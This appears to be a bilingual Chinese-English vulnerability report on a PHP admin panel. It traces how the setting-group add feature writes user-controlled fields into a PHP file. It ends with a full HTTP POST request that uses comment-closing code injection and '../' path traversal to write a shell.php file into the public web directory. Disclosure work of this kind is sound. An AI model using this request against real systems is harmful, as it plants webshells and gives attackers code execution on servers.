漏洞分析 Vulnerability analysis
漏洞点位于app/admin/common.php
中的create_setting_file
方法,可以看到第125行有file_put_contents($path, $file_code);
写入文件,然后我们倒过来看看$path
和$file_code
两个参数是否可控。
The vulnerability point is located in the create_setting_file
method in the app/admin/common.php
file. You can see that line 125 has the file_put_contents($path, $file_code);
method to write the file, and then we reverse the process to see if the $path
and $file_code
two parameters are controllable.
$path
参数如下图,直接拼接传入的$data->code
作为写入的文件路径:
The $path
parameter is as follows, splicing the incoming $data->code
directly as the path to the file to be written:
![image](https://user-images.githubusercontent.com/66706544/155530076-8afa0c13-5263-46f9-a719-74fbca820fb5.png)
然后$file_code
参数如图,主要看108行的name
和description
,也是直接拼接,但是在这之前还拼接了注释符,我们后面再来看能不能绕过。
Then $file_code
parameters as shown, mainly look at the 108 lines of name
and description
, also directly spliced, but before that also spliced the comment character, I will explain later how to bypass.
![image](https://user-images.githubusercontent.com/66706544/155530195-5345a6d2-df27-4f6a-8353-bd8b89864093.png)
在app/admin/controller/SettingGroupController.php
中的add
方法中调用了create_setting_file
方法,并且没有其他过滤和转义,所以绕过注释也很简单,只需要闭合前后注释即可。
The create_setting_file
method is called in the add
method in the app/admin/controller/SettingGroupController.php
file, and there are no other filters or escapes, so it's easy to bypass the comments, just close the comment symbols before and after.
最后生成的恶意文件长这样:
The final malicious file generated looks like this:
![image](https://user-images.githubusercontent.com/66706544/155530267-3a0981c3-938f-4853-8bfe-2b3a5a2feacb.png)
所以我们可以直接通过开发管理->设置配置->设置分组管理来传入构造的payload,造成路径穿越写入恶意webshell到public目录。
So we can directly pass in the constructed payload through Development Management->Setup Configuration->Setup Grouping Management, causing path traversal to write malicious webshell to the public directory.
漏洞复现 Vulnerability Reproduction
在开发管理->设置配置->设置分组管理->添加,构造下图payload,点击保存即可在public目录下写入shell.php。
In the development management->settings configuration->settings group management->add, construct the payload shown below, click save to write shell.php in the public directory.
![image](https://user-images.githubusercontent.com/66706544/155530339-8333003f-280a-4d5b-b28b-e5bff0f546de.png)
数据包:
Data package:
POST /admin/SettingGroup/add.html HTTP/1.1
Host: 192.168.3.60:8083
Content-Length: 997
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEHW2gVJUhcSza8yd
Origin: http://192.168.3.60:8083
Referer: http://192.168.3.60:8083/admin/SettingGroup/add.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: AppSId=07d81f216f3f5f3805e2256f4c932291; admin_user_id=1; admin_user_sign=b22e396b1ac2df18b9bcead37f3e002f; device_id_uid_1=1e50ee83f9b8aff2e47b9d172cc892195b49ea98; DarkMode=0; HeaderFixed=0; DropdownLegacyOffset=0; NoBorder=0; SidebarCollapsed=0; SidebarFixed=0; SidebarMini=0; SidebarMiniMd=0; SidebarMiniXs=0; FlatSidebar=0; LegacySidebar=0; CompactSidebar=0; ChildIndentSidebar=0; ChildHideSidebar=0; NoExpandSidebar=0; FootFixed=0; TextSmBody=0; TextSmHeader=0; TextSmBrand=0; TextSmSidebar=0; TextSmFooter=0
Connection: close
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="module"
admin
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="name"
*/phpinfo();/*
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="description"
*//*
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="code"
../../../public/shell
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="sort_number"
1000
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="icon"
fas fa-list
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="auto_create_menu"
0
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="auto_create_file"
1
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="__token__"
f5d12a0b26db2bddce591189850d08b5
------WebKitFormBoundaryEHW2gVJUhcSza8yd--
结果:
Results:
![image](https://user-images.githubusercontent.com/66706544/155530450-50cb813b-41a2-456b-a412-51aa3b5ac4bc.png)